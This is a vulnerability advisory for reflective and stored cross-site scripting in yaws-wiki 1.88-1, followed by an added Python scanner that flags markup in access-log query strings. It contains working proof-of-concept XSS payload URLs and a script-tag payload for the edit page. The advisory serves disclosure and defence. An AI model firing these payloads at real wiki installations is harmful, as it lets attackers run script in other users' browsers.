Vendor: yaws-wiki
By: Michael Brooks
CVSS: 8.8 (HIGH)
Cross-Site Scripting (XSS)
CWE: 79
Product Name: yaws-wiki
Affected Version From: 1.88-1
Affected Version To: 1.88-1
Patch Exists: NO
Related CWE: N/A
CPE: a:yaws:yaws-wiki
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Erlang
2020

Reflective and Stored XSS in yaws-wiki

yaws-wiki version 1.88-1 is vulnerable to both reflective and stored XSS. The vulnerability exists in the editTag.yaws, showOldPage.yaws, allRefsToMe.yaws and editPage.yaws pages. An attacker can inject malicious JavaScript code in the 'node' parameter of the editTag.yaws, showOldPage.yaws and allRefsToMe.yaws pages and in the 'text' parameter of the editPage.yaws page.

Mitigation:

Input validation should be used to prevent malicious code from being injected into the application.

Exploit-DB raw data:

Application: yaws-wiki
version affected: 1.88-1
platform: Erlang
homepage: http://yaws.hyber.org/
Researcher: Michael Brooks
Original Advisory: https://sitewat.ch/en/Advisory/4

Install instructions for Ubuntu:
sudo apt-get install yaws-wiki

Edit: /etc/yaws/conf.d/yaws-wiki.conf
#add this:
<server wiki>
 port = 8181
 listen = 0.0.0.0
 docroot = /var/lib/yaws-wiki
</server>

Then restart yaws:
sudo /etc/init.d/yaws restart


Reflective XSS:
http://localhost:8181/editTag.yaws?node=ALockedPage&tag=%3E%3C/pre%3E%3CScRiPt%3Ealert(1)%3C/ScRiPt%3E
http://localhost:8181/showOldPage.yaws?node=home&index=%3E%3C/pre%3E%3CScRiPt%3Ealert(1)%3C/ScRiPt%3E
http://localhost:8181/allRefsToMe.yaws?node=%3E%3C/pre%3E%3CScRiPt%3Ealert(1)%3C/ScRiPt%3E

Stored XSS:
http://localhost:8181/editPage.yaws?node=home

The large textbox on the editPage.yaws page is vulnerable to XSS.  This is
the "text" POST variable:
<script>alert(1)</script>
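
An added example, not part of the original advisory: with no patch listed, one way to spot attempts against the reflective URLs above is to scan the web server access log for requests to those pages whose decoded query parameters contain HTML markup characters. It checks every parameter, since the URLs above carry the payload in tag, index and node; the Common Log Format layout, the function names and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Pages the advisory lists as reflecting query parameters into the response.
REFLECTING_PAGES = {"/editTag.yaws", "/showOldPage.yaws", "/allRefsToMe.yaws"}
# Characters that let a value break out of the surrounding HTML context.
# Matching on these, not on the word "script", is unaffected by mixed-case tags.
MARKUP = re.compile(r"[<>\"']")
# Request line of a Common Log Format entry (assumed access log layout).
REQUEST = re.compile(r'"(?:GET|HEAD|POST) (\S+) HTTP/[\d.]+"')


def markup_params(target):
    """Return names of query parameters whose decoded value contains markup."""
    parts = urlsplit(target)
    if parts.path not in REFLECTING_PAGES:
        return []
    # parse_qsl percent-decodes once, matching what the page handler receives.
    pairs = parse_qsl(parts.query, keep_blank_values=True)
    return [name for name, value in pairs if MARKUP.search(value)]


def scan(lines):
    """Return (client, request target, parameter names) per suspicious entry."""
    findings = []
    for line in lines:
        match = REQUEST.search(line)
        hits = markup_params(match.group(1)) if match else []
        if hits:
            findings.append((line.split(" ", 1)[0], match.group(1), hits))
    return findings


# Constructed sample entries; client addresses are documentation ranges.
# The stored XSS arrives in the POST body of editPage.yaws ("text"), which an
# access log does not record, so this scan cannot see it.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2020:10:00:00 +0000] '
    '"GET /showOldPage.yaws?node=home&index=3 HTTP/1.1" 200 2310',
    '198.51.100.7 - - [01/Jan/2020:10:00:05 +0000] "GET /allRefsToMe.yaws'
    '?node=%3E%3C/pre%3E%3CScRiPt%3Ealert(1)%3C/ScRiPt%3E HTTP/1.1" 200 1874',
    '198.51.100.7 - - [01/Jan/2020:10:00:09 +0000] "GET /editTag.yaws?node=ALockedPage'
    '&tag=%3E%3C/pre%3E%3CScRiPt%3Ealert(1)%3C/ScRiPt%3E HTTP/1.1" 200 1902',
]

if __name__ == "__main__":
    for client, target, params in scan(SAMPLE_LOG):
        print(f"{client} sent markup in {params}: {target}")
```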